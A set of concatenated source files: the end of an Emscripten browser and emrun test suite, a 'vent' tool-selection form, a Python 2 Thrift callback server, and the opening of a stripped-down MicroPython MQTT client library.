locateFile: function (path) {
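// With SINGLE_FILE, embedded data: URIs are expected to be used as-is and never passed through locateFile.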
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([test_file('pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(test_file('pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(test_file('emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(test_file('emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(test_file('emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(test_file('emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(test_file('emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(test_file('emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(test_file('emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(test_file('emscripten_console_log.c'), '0', args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(test_file('small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(test_file('browser', 'test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-gsource-map', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(test_file('browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in the VM, and try again. Should still work with the Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file; that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(test_file('system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', test_file('test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', test_file('test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(test_file('alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser', 'emmalloc_memgrowth.cpp'), expected='0', args=['-s', 'MALLOC=emmalloc', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'ABORTING_MALLOC=0', '-s', 'ASSERTIONS=2', '-s', 'MINIMAL_RUNTIME=1', '-s', 'MAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. Often that occurred in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(test_file('pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser', 'test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows so that it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass an argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
choose_tools.py
|
import npyscreen
import threading
import time
from vent.api.actions import Action
from vent.api.menu_helpers import MenuHelper
from vent.helpers.meta import Tools
class ChooseToolsForm(npyscreen.ActionForm):
""" For picking which tools to add """
tools_tc = {}
def repo_tools(self, branch):
""" Set the appropriate repo dir and get the tools available of it """
tools = []
m_helper = MenuHelper()
repo = self.parentApp.repo_value['repo']
version = self.parentApp.repo_value['versions'][branch]
status = m_helper.repo_tools(repo, branch, version)
if status[0]:
r_tools = status[1]
for tool in r_tools:
tools.append(tool[0])
return tools
def create(self):
""" Update with current tools for each branch at the version chosen """
self.add_handlers({"^Q": self.quit})
self.add(npyscreen.TitleText,
name='Select which tools to add from each branch selected:',
editable=False)
self.add(npyscreen.Textfield,
value='NOTE tools you have already installed will be ignored',
color='STANDOUT',
editable=False)
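# 'i' tracks the vertical screen position (rely) at which the next widget is placed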
i = 6
for branch in self.parentApp.repo_value['versions']:
self.tools_tc[branch] = {}
self.add(npyscreen.TitleText,
name='Branch: ' + branch,
editable=False,
rely=i,
relx=5,
max_width=25)
tools = self.repo_tools(branch)
i += 1
for tool in tools:
value = True
if tool.startswith("/dev"):
value = False
# tool in base directory
if tool == "" or tool.startswith(':'):
tool = "/" + tool
self.tools_tc[branch][tool] = self.add(npyscreen.CheckBox,
name=tool,
value=value,
relx=10)
i += 1
i += 2
def quit(self, *args, **kwargs):
self.parentApp.switchForm("MAIN")
def on_ok(self):
"""
Take the tool selections and add them as plugins
"""
def diff(first, second):
"""
Get the elements that exist in the first list and not in the second
"""
second = set(second)
return [item for item in first if item not in second]
def popup(original_tools, branch, thr, title):
"""
Start the thread and display a popup of the tools being added until
the thread is finished
"""
thr.start()
tool_str = "Adding tools..."
npyscreen.notify_wait(tool_str, title=title)
while thr.is_alive():
tools = diff(Tools(), original_tools)
if tools:
tool_str = ""
for tool in tools:
pre_tool = "Added: " + branch + "/" + tool + "\n"
tool_str = pre_tool + tool_str
npyscreen.notify_wait(tool_str, title=title)
time.sleep(1)
return
original_tools = Tools()
for branch in self.tools_tc:
api_action = Action()
tools = []
for tool in self.tools_tc[branch]:
if self.tools_tc[branch][tool].value:
# get rid of temporary show for multiple tools in same
# directory
if tool == '/':
tools.append(('.', ''))
else:
tools.append((tool, ''))
repo = self.parentApp.repo_value['repo']
version = self.parentApp.repo_value['versions'][branch]
build = self.parentApp.repo_value['build'][branch]
thr = threading.Thread(target=api_action.add, args=(),
kwargs={'repo': repo,
'branch': branch,
'tools': tools,
'version': version,
'build': build})
popup(original_tools, branch, thr,
'Please wait, adding tools for the ' + branch + ' branch...')
npyscreen.notify_confirm("Done adding repository: " +
self.parentApp.repo_value['repo'],
title='Added Repository')
self.quit()
def on_cancel(self):
self.quit()
|
EventServer.py
|
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
import threading
from wpwithin.WPWithinCallback import Client
from wpwithin.WPWithinCallback import Processor
class CallbackHandler:
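# Default listener used when no custom handler is passed to EventServer;
# it simply prints the fields of each callback it receives.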
def __init__(self):
self.log = {}
def beginServiceDelivery(self, serviceId, serviceDeliveryToken, unitsToSupply):
try:
print "event from core - onBeginServiceDelivery()"
print "ServiceID: {0}\n".format(serviceId)
print "UnitsToSupply: {0}\n".format(unitsToSupply)
print "SDT.Key: {0}\n".format(serviceDeliveryToken.key)
print "SDT.Expiry: {0}\n".format(serviceDeliveryToken.expiry)
print "SDT.Issued: {0}\n".format(serviceDeliveryToken.issued)
print "SDT.Signature: {0}\n".format(serviceDeliveryToken.signature)
print "SDT.RefundOnExpiry: {0}\n".format(serviceDeliveryToken.refundOnExpiry)
except Exception as e:
print "doBeginServiceDelivery failed: " + str(e)
def endServiceDelivery(self, serviceId, serviceDeliveryToken, unitsReceived):
try:
print "event from core - onEndServiceDelivery()"
print "ServiceID: {0}\n".format(serviceId)
print "UnitsReceived: {0}\n".format(unitsReceived)
print "SDT.Key: {0}\n".format(serviceDeliveryToken.key)
print "SDT.Expiry: {0}\n".format(serviceDeliveryToken.expiry)
print "SDT.Issued: {0}\n".format(serviceDeliveryToken.issued)
print "SDT.Signature: {0}\n".format(serviceDeliveryToken.signature)
print "SDT.RefundOnExpiry: {0}\n".format(serviceDeliveryToken.refundOnExpiry)
except Exception as e:
print "doEndServiceDelivery failed: " + str(e)
class EventServer:
server = None
def startServer(self, server):
print "##### STARTING WRAPPER SERVER to receive callbacks #####"
print "##### SERVER: " + str(server)
server.serve()
def stop(self):
if self.server is not None:
self.server.setShouldStop(True)
def __init__(self, listenerHandler, hostname, port):
try:
if listenerHandler is None:
print "Using built-in handler"
theListenerToUse = CallbackHandler()
else:
print "Using custom handler"
theListenerToUse = listenerHandler
processor = Processor(theListenerToUse)
transport = TSocket.TServerSocket(host=hostname, port=port)
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
#self.server = TServer.TThreadedServer(processor, transport, tfactory, pfactory)
self.server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
print "Serving the Wrapper listener, port: " + str(port)
thread = threading.Thread(target=self.startServer, args=([self.server]))
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
print "##### SERVER: " + str(self.server)
print "##### SERVER: SHOULD HAVE STARTED"
print "Should have started Wrapper listener"
except Exception as e:
print "Event server setup failed: " + str(e)
|
upahomqtt.py
|
# This is a stripped down version of paho-mqtt intended for MicroPython.
# https://github.com/ElliottWaterman/upaho-mqtt
import time # utime as time
from time import sleep #, sleep_ms
import threading
from sys import platform as sys_platform, implementation as sys_implementation
import struct # ustruct as struct
import errno
import select
import socket
ssl = None
try:
import ssl
except ImportError:
print("Failed to import ssl")
pass
try:
# Use monotonic clock if available
time_func = time.monotonic
except AttributeError:
time_func = time.time
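# Select the errno value that signals a non-blocking socket operation would block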
if sys_platform == 'win32': # or sys_platform == 'linux' or sys_platform == 'darwin':
EAGAIN = errno.WSAEWOULDBLOCK
else: # elif sys_platform == 'GPy'
EAGAIN = errno.EAGAIN
if sys_implementation.name == 'micropython':
DEBUG_PC = False # MicroPython
else:
DEBUG_PC = True # Python
print("DEBUG_PC: " + str(DEBUG_PC))
MQTTv31 = 3
MQTTv311 = 4
PROTOCOL_NAMEv31 = b"MQIsdp"
PROTOCOL_NAMEv311 = b"MQTT"
PROTOCOL_VERSION = 3
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish = 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
sockpair_data = b"0"
class WouldBlockError(Exception):
pass
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == CONNACK_ACCEPTED:
return "Connection Accepted."
elif connack_code == CONNACK_REFUSED_PROTOCOL_VERSION:
return "Connection Refused: unacceptable protocol version."
elif connack_code == CONNACK_REFUSED_IDENTIFIER_REJECTED:
return "Connection Refused: identifier rejected."
elif connack_code == CONNACK_REFUSED_SERVER_UNAVAILABLE:
return "Connection Refused: broker unavailable."
elif connack_code == CONNACK_REFUSED_BAD_USERNAME_PASSWORD:
return "Connection Refused: bad user name or password."
elif connack_code == CONNACK_REFUSED_NOT_AUTHORIZED:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
result = True
multilevel_wildcard = False
slen = len(sub)
tlen = len(topic)
if slen > 0 and tlen > 0:
if (sub[0] == '$' and topic[0] != '$') or (topic[0] == '$' and sub[0] != '$'):
return False
spos = 0
tpos = 0
while spos < slen and tpos < tlen:
if sub[spos] == topic[tpos]:
if tpos == tlen-1:
# Check for e.g. foo matching foo/#
